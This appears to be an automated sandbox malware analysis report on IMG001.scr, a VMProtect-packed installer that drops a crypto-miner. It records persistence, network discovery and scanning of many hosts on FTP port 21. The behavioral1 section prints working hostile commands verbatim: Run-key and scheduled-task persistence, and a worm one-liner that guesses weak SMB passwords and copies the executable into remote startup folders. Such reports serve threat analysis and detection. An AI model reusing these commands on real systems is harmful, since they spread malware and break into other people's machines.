Malware Analysis Report

2025-03-15 05:55

Sample ID 240514-lwwk7aah8y
Target IMG001.scr
SHA256 d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
Tags
vmprotect persistence discovery
score
10/10

Analysis Overview

score
10/10

SHA256

d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c

Threat Level: Known bad

The file IMG001.scr was found to be: Known bad.

Malicious Activity Summary

vmprotect persistence discovery

Contacts a large (1048) amount of remote hosts

VMProtect packed file

Loads dropped DLL

Executes dropped EXE

Drops startup file

Adds Run key to start application

Enumerates connected drives

Suspicious use of NtSetInformationThreadHideFromDebugger

Drops file in Windows directory

Program crash

Unsigned PE

Enumerates physical storage devices

NSIS installer

Suspicious use of AdjustPrivilegeToken

Creates scheduled task(s)

Suspicious use of WriteProcessMemory

Discovers systems in the same network

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-05-14 09:53

Signatures

VMProtect packed file

vmprotect

Unsigned PE

NSIS installer

installer

Analysis: behavioral11

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240508-en

Max time kernel

146s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\lzma.exe"

Signatures

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\lzma.exe

"C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\lzma.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 1832 -ip 1832

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 1832 -s 812

Network

Country Destination Domain Proto
US 52.111.229.19:443 tcp

Files

N/A

Analysis: behavioral12

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240508-en

Max time kernel

90s

Max time network

92s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\zlib.exe"

Signatures

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\zlib.exe

"C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\zlib.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 752 -ip 752

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 752 -s 844

Network

Files

N/A

Analysis: behavioral13

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240508-en

Max time kernel

91s

Max time network

105s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$R9\makensis.exe"

Signatures

N/A

Processes

C:\Users\Admin\AppData\Local\Temp\$R9\makensis.exe

"C:\Users\Admin\AppData\Local\Temp\$R9\makensis.exe"

Network

Country Destination Domain Proto
US 52.111.227.11:443 tcp
US 8.8.8.8:53 48.229.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240426-en

Max time kernel

143s

Max time network

156s

Command Line

"C:\Users\Admin\AppData\Local\Temp\IMG001.scr" /S

Signatures

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Run.lnk C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-1696768468-2170909707-4198977321-1000\Software\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run\ = "C:\\Users\\Admin\\AppData\\Roaming\\NsMiner\\IMG001.exe" C:\Windows\SysWOW64\reg.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\E: C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File created C:\Windows\Tasks\UAC.job C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates physical storage devices

NSIS installer

installer

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Discovers systems in the same network

discovery
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\net.exe N/A
N/A N/A C:\Windows\SysWOW64\net.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\SysWOW64\powercfg.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1916 wrote to memory of 2632 N/A C:\Users\Admin\AppData\Local\Temp\IMG001.scr C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe
PID 2632 wrote to memory of 1588 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 4976 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 2120 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 2632 wrote to memory of 5020 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 1588 wrote to memory of 3560 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\reg.exe
PID 5020 wrote to memory of 1064 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\powercfg.exe
PID 2120 wrote to memory of 2364 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 4976 wrote to memory of 2952 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\schtasks.exe
PID 5020 wrote to memory of 4868 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\powercfg.exe
PID 5020 wrote to memory of 3744 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\powercfg.exe
PID 2632 wrote to memory of 4160 N/A C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 1908 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 1908 wrote to memory of 1260 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 1908 wrote to memory of 4768 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 1908 wrote to memory of 4900 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\ARP.EXE
PID 1908 wrote to memory of 1820 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe
PID 4160 wrote to memory of 764 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 4160 wrote to memory of 2200 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\cmd.exe
PID 2200 wrote to memory of 2072 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\net.exe
PID 2200 wrote to memory of 4852 N/A C:\Windows\SysWOW64\cmd.exe C:\Windows\SysWOW64\find.exe

Processes

C:\Users\Admin\AppData\Local\Temp\IMG001.scr

"C:\Users\Admin\AppData\Local\Temp\IMG001.scr" /S

C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe

"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /c powercfg /CHANGE -standby-timeout-ac 0 & powercfg /CHANGE -hibernate-timeout-ac 0 & Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

C:\Windows\SysWOW64\reg.exe

reg add "HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "" /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" /t REG_SZ

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "UAC" /RU "SYSTEM" /SC ONLOGON /F /V1 /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\powercfg.exe

powercfg /CHANGE -standby-timeout-ac 0

C:\Windows\SysWOW64\schtasks.exe

schtasks /create /tn "UAC" /SC ONLOGON /F /RL HIGHEST /TR "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe"

C:\Windows\SysWOW64\powercfg.exe

powercfg /CHANGE -hibernate-timeout-ac 0

C:\Windows\SysWOW64\powercfg.exe

Powercfg -SetAcValueIndex 381b4222-f694-41f0-9685-ff5bb260df2e 4f971e89-eebd-4455-a8de-9e59040e7347 5ca83367-6e45-459f-a27b-476b1d01c936 000

C:\Windows\SysWOW64\cmd.exe

"C:\Windows\system32\cmd.exe" /v:on /c @(for /f "usebackq tokens=1" %i in (`@net view^|find /i "\\" ^|^| @arp -a^|find /i " 1"`) do @set str_!random!=%i)& @for /f "usebackq tokens=1* delims==" %j in (`set str_`) do @set s=%k& set s=!s:\\=!& set l=!s:-PC=!& set l=!l:-ÏÊ=!& set f=IMG001.exe& set n=0102& @if not "!s!"=="%COMPUTERNAME%" @echo connect to \\!s! & (for /f "usebackq tokens=1" %j in (`net view \\!s!^|find /i " "`) do @echo f|xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" "\\!s!\%j\!f!" 1>nul && @echo copy to "\\!s!\%j\!f!") & @net use * /delete /y 2>nul & @(for %u in (1 !l! administrator user admin àäìèíèñòðàòîð) do @for %p in (0 1 123 %u !n! "") do @ping -n 3 localhost>nul & @(for %c in (\\!s!\C$ \\!s!\Users) do @echo connect to %c %p %u & @(if not "%p%u"=="01" net use %c "%p" /user:"%u") && @((echo [Section1] & echo p=%p %u)>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & @(for %d in ("%c\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\All Users\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Users\%u\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\All Users\Start Menu\Programs\Startup\!f!" "%c\Documents and Settings\%u\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Documents and Settings\All Users\Ãëàâíîå ìåíþ\Ïðîãðàììû\Àâòîçàãðóçêà\!f!" "%c\Windows\Profiles\%u\Start Menu\Programs\Startup\!f!" "%c\Windows\All Users\Start menu\Programs\Startup\!f!" "%c\%u\!f!" ) do @echo f|@xcopy /y /d "C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe" %d 1>nul && @echo copy to %d) & @echo nul>"C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe:P" & net use %c /delete /y 2>nul & @ping -n 20 localhost>nul)))

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c @net view|find /i "\\" || @arp -a|find /i " 1"

C:\Windows\SysWOW64\net.exe

net view

C:\Windows\SysWOW64\find.exe

find /i "\\"

C:\Windows\SysWOW64\ARP.EXE

arp -a

C:\Windows\SysWOW64\find.exe

find /i " 1"

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c set str_

C:\Windows\SysWOW64\cmd.exe

C:\Windows\system32\cmd.exe /c net view \\10.127.0.1|find /i " "

C:\Windows\SysWOW64\net.exe

net view \\10.127.0.1

C:\Windows\SysWOW64\find.exe

find /i " "

Network

Country Destination Domain Proto
US 8.8.8.8:53 stafftest.ru udp
N/A 10.127.0.1:445 tcp
N/A 10.127.0.1:443 udp
N/A 10.127.0.1:139 tcp

Files

C:\Users\Admin\AppData\Roaming\NsMiner\IMG001.exe

MD5 fbbcf1e9501234d6661a0c9ae6dc01c9
SHA1 1ca9759a324159f331e79ea6871ad62040521b41
SHA256 d9901b16a93aad709947524379d572a7a7bf8e2741e27a1112c95977d4a6ea8c
SHA512 027e5ea6d92955b87439f61704de5b3e21c7a8e0a95327868951968e4f5cbed59cf1e803ac9adb2c9cf577db7a2f6fd4383b7384d57a78596cfb2ff020907140

C:\Users\Admin\AppData\Local\Temp\nsy661A.tmp\inetc.dll

MD5 d7a3fa6a6c738b4a3c40d5602af20b08
SHA1 34fc75d97f640609cb6cadb001da2cb2c0b3538a
SHA256 67eff17c53a78c8ec9a28f392b9bb93df3e74f96f6ecd87a333a482c36546b3e
SHA512 75cf123448567806be5f852ebf70f398da881e89994b82442a1f4bc6799894e799f979f5ab1cc9ba12617e48620e6c34f71e23259da498da37354e5fd3c0f934

Analysis: behavioral2

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240426-en

Max time kernel

146s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\ExecDos.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 224 wrote to memory of 2532 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\ExecDos.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\ExecDos.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 2532 -ip 2532

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 2532 -s 448

Network

Files

N/A

Analysis: behavioral5

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240426-en

Max time kernel

91s

Max time network

101s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$R9\NsCpuCNMiner64.exe"

Signatures

VMProtect packed file

vmprotect

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\$R9\NsCpuCNMiner64.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\$R9\NsCpuCNMiner64.exe

"C:\Users\Admin\AppData\Local\Temp\$R9\NsCpuCNMiner64.exe"

Network

Country Destination Domain Proto
US 52.111.229.48:443 tcp

Files

memory/1772-0-0x00007FF6DC2F0000-0x00007FF6DC69D000-memory.dmp

memory/1772-1-0x00007FF6DC2F0000-0x00007FF6DC69D000-memory.dmp

memory/1772-5-0x00007FF6DC2F0000-0x00007FF6DC69D000-memory.dmp

Analysis: behavioral9

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240426-en

Max time kernel

146s

Max time network

152s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\bzip2.exe"

Signatures

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\bzip2.exe

"C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\bzip2.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5036 -ip 5036

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 844

Network

Country Destination Domain Proto
US 52.111.227.11:443 tcp

Files

N/A

Analysis: behavioral10

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240426-en

Max time kernel

147s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\bzip2_solid.exe"

Signatures

Enumerates physical storage devices

Processes

C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\bzip2_solid.exe

"C:\Users\Admin\AppData\Local\Temp\$R9\Stubs\bzip2_solid.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3760 -ip 3760

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3760 -s 812

Network

Country Destination Domain Proto
NL 52.111.243.30:443 tcp

Files

N/A

Analysis: behavioral3

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240426-en

Max time kernel

146s

Max time network

155s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\inetc.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5072 wrote to memory of 132 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\inetc.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$PLUGINSDIR\inetc.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 132 -ip 132

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 132 -s 480

Network

Country Destination Domain Proto
US 52.111.227.11:443 tcp
US 8.8.8.8:53 22.236.111.52.in-addr.arpa udp

Files

N/A

Analysis: behavioral4

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240426-en

Max time kernel

146s

Max time network

155s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$R9\NsCpuCNMiner32.exe"

Signatures

VMProtect packed file

vmprotect

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\$R9\NsCpuCNMiner32.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\$R9\NsCpuCNMiner32.exe

"C:\Users\Admin\AppData\Local\Temp\$R9\NsCpuCNMiner32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 11.227.111.52.in-addr.arpa udp

Files

memory/3860-0-0x0000000000F10000-0x0000000001259000-memory.dmp

memory/3860-1-0x0000000000F10000-0x0000000001259000-memory.dmp

memory/3860-4-0x0000000000F10000-0x0000000001259000-memory.dmp

Analysis: behavioral6

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240508-en

Max time kernel

146s

Max time network

151s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\ExecDos.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2664 wrote to memory of 3240 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\ExecDos.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\ExecDos.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 3240 -ip 3240

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 3240 -s 448

Network

Country Destination Domain Proto
US 8.8.8.8:53 8.8.8.8.in-addr.arpa udp

Files

N/A

Analysis: behavioral7

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240508-en

Max time kernel

90s

Max time network

99s

Command Line

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\inetc.dll,#1

Signatures

Program crash

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\rundll32.exe

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 5104 wrote to memory of 5036 N/A C:\Windows\system32\rundll32.exe C:\Windows\SysWOW64\rundll32.exe

Processes

C:\Windows\system32\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\inetc.dll,#1

C:\Windows\SysWOW64\rundll32.exe

rundll32.exe C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\inetc.dll,#1

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 5036 -ip 5036

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 5036 -s 480

Network

Files

N/A

Analysis: behavioral8

Detonation Overview

Submitted

2024-05-14 09:53

Reported

2024-05-14 09:56

Platform

win11-20240508-en

Max time kernel

150s

Max time network

157s

Command Line

"C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\tftp.exe"

Signatures

Contacts a large (1048) amount of remote hosts

discovery

Processes

C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\tftp.exe

"C:\Users\Admin\AppData\Local\Temp\$R9\Plugins\tftp.exe"

Network

SG 151.153.136.3:21 tcp
SE 212.37.29.3:21 tcp
BR 177.2.130.3:21 tcp
JP 60.136.114.3:21 tcp
DZ 154.241.110.3:21 tcp
US 70.8.34.3:21 tcp
TW 111.249.33.3:21 tcp
US 208.107.213.3:21 tcp
US 28.45.159.3:21 tcp
US 11.19.200.3:21 tcp
JP 49.97.176.3:21 tcp
CN 220.173.15.3:21 tcp
US 8.116.248.3:21 tcp
ES 79.146.111.3:21 tcp
RU 185.48.238.3:21 tcp
DE 217.93.12.3:21 tcp
AU 202.27.81.3:21 tcp
US 35.130.22.3:21 tcp
US 168.9.62.3:21 tcp
SE 212.247.0.3:21 tcp
UA 178.133.120.3:21 tcp
CN 14.197.69.3:21 tcp
US 66.198.71.3:21 tcp
US 96.24.29.3:21 tcp
US 98.156.38.3:21 tcp
ES 85.48.205.3:21 tcp
US 209.192.107.3:21 tcp
US 159.35.129.3:21 tcp
US 143.81.179.3:21 tcp
CL 179.4.143.3:21 tcp
UA 37.73.213.3:21 tcp
JP 126.53.17.3:21 tcp
AU 49.185.142.3:21 tcp
FI 194.215.19.3:21 tcp
US 4.8.71.3:21 tcp
US 19.34.229.3:21 tcp
KR 211.254.84.3:21 tcp
US 26.47.117.3:21 tcp
MX 200.34.156.3:21 tcp
GB 87.87.207.3:21 tcp
US 208.6.57.3:21 tcp
US 44.11.252.3:21 tcp
US 44.151.112.3:21 tcp
IN 14.102.6.3:21 tcp
DE 87.138.93.3:21 tcp
CN 117.114.1.3:21 tcp
GB 25.74.172.3:21 tcp
CN 112.99.31.3:21 tcp
US 33.75.25.3:21 tcp
JP 218.133.226.3:21 tcp
GB 51.251.176.3:21 tcp
CZ 91.106.244.3:21 tcp
AT 84.112.112.3:21 tcp
US 40.238.180.3:21 tcp
US 130.122.58.3:21 tcp
UA 128.124.200.3:21 tcp
US 23.27.136.3:21 tcp
US 215.14.232.3:21 tcp
JP 183.181.216.3:21 tcp
IN 59.91.162.3:21 tcp
US 75.238.232.3:21 tcp
DE 159.200.161.3:21 tcp
US 24.61.172.3:21 tcp
GB 146.42.192.3:21 tcp
US 35.87.45.3:21 tcp
US 199.70.40.3:21 tcp
US 8.8.8.8:53 3.136.27.23.in-addr.arpa udp
US 15.31.215.4:21 tcp
US 26.236.65.4:21 tcp
GB 158.234.189.4:21 tcp
US 68.213.189.4:21 tcp
PA 201.225.42.4:21 tcp
US 48.145.17.4:21 tcp
US 75.234.255.4:21 tcp
CN 223.221.63.4:21 tcp
US 99.163.146.4:21 tcp
US 152.229.120.4:21 tcp
ZA 41.4.156.4:21 tcp
NL 145.50.55.4:21 tcp
US 15.172.156.4:21 tcp
CA 147.253.112.4:21 tcp
US 69.100.228.4:21 tcp
BR 191.246.105.4:21 tcp
CN 113.114.136.4:21 tcp
US 143.211.166.4:21 tcp
DE 109.47.229.4:21 tcp
CN 36.192.3.4:21 tcp
US 146.130.21.4:21 tcp
US 40.86.120.4:21 tcp
US 147.176.233.4:21 tcp
KR 223.165.134.4:21 tcp
JP 60.131.40.4:21 tcp
IT 2.225.32.4:21 tcp
JP 126.255.153.4:21 tcp
US 16.84.39.4:21 tcp
CN 116.52.253.4:21 tcp
US 63.60.35.4:21 tcp
US 48.213.125.4:21 tcp
US 32.117.169.4:21 tcp
US 35.231.32.4:21 tcp
US 170.58.198.4:21 tcp
DE 53.231.81.4:21 tcp
CN 120.81.225.4:21 tcp
CN 113.55.208.4:21 tcp
US 208.120.182.4:21 tcp
US 73.149.179.4:21 tcp
CN 122.78.185.4:21 tcp
JP 60.192.74.4:21 tcp
DE 194.94.195.4:21 tcp
CN 39.159.120.4:21 tcp
CN 202.120.123.4:21 tcp
US 65.136.104.4:21 tcp
CN 114.68.24.4:21 tcp
ZA 41.146.143.4:21 tcp
N/A 127.251.127.4:21 tcp
CN 129.211.84.4:21 tcp
CN 106.8.45.4:21 tcp
US 130.91.76.4:21 tcp
US 96.213.50.4:21 tcp
IL 109.226.50.4:21 tcp
JP 121.1.192.4:21 tcp
UA 85.238.123.4:21 tcp
KR 115.93.193.4:21 tcp
US 205.109.99.4:21 tcp
US 107.143.218.4:21 tcp
US 129.221.133.4:21 tcp
SE 2.248.21.4:21 tcp
US 21.249.161.4:21 tcp
US 132.148.135.4:21 tcp
JP 58.146.68.4:21 tcp
BE 157.193.159.4:21 tcp
US 134.120.24.4:21 tcp
US 149.38.87.4:21 tcp
US 140.187.29.4:21 tcp
US 8.192.38.4:21 tcp
GB 213.104.74.4:21 tcp
US 97.105.101.4:21 tcp
US 152.86.247.4:21 tcp
VI 146.226.241.4:21 tcp
NO 144.181.46.4:21 tcp
KR 219.253.141.4:21 tcp
US 22.105.33.4:21 tcp
NO 46.230.137.4:21 tcp
US 21.156.189.4:21 tcp
JP 124.44.200.4:21 tcp
US 50.229.129.4:21 tcp
JP 133.171.127.4:21 tcp
US 161.61.125.4:21 tcp
CN 202.195.132.4:21 tcp
DE 141.25.34.5:21 tcp
IE 52.16.76.5:21 tcp
CO 181.205.251.5:21 tcp
US 56.8.205.5:21 tcp
US 136.234.35.5:21 tcp
CN 111.215.81.5:21 tcp
JP 219.185.140.5:21 tcp
BE 178.119.200.5:21 tcp
US 50.194.226.5:21 tcp
US 63.129.22.5:21 tcp
RU 87.225.57.5:21 tcp
US 67.96.25.5:21 tcp
BE 81.241.229.5:21 tcp
US 32.89.147.5:21 tcp
US 6.109.159.5:21 tcp
JP 36.240.74.5:21 tcp
AU 101.189.130.5:21 tcp
ZM 45.213.112.5:21 tcp
CN 129.204.17.5:21 tcp
US 148.194.105.5:21 tcp
CN 221.195.24.5:21 tcp
CN 125.36.85.5:21 tcp
US 137.148.14.5:21 tcp
US 13.0.55.5:21 tcp
CN 61.183.159.5:21 tcp
ES 193.146.100.5:21 tcp
N/A 172.29.9.5:21 tcp
US 76.184.61.5:21 tcp
US 214.27.187.5:21 tcp
US 64.237.39.5:21 tcp
NO 84.211.130.5:21 tcp
CN 124.93.249.5:21 tcp
US 75.1.29.5:21 tcp
HN 190.97.191.5:21 tcp
US 169.164.151.5:21 tcp
CH 130.60.35.5:21 tcp
US 98.40.146.5:21 tcp
US 199.232.248.5:21 tcp
US 161.247.1.5:21 tcp
US 151.210.92.5:21 tcp
US 150.202.216.5:21 tcp
DE 88.76.191.5:21 tcp
TW 103.222.250.5:21 tcp
US 216.119.136.5:21 tcp
DZ 197.202.81.5:21 tcp
MY 115.132.63.5:21 tcp
BR 200.129.160.5:21 tcp
US 24.194.192.5:21 tcp
VN 113.191.239.5:21 tcp
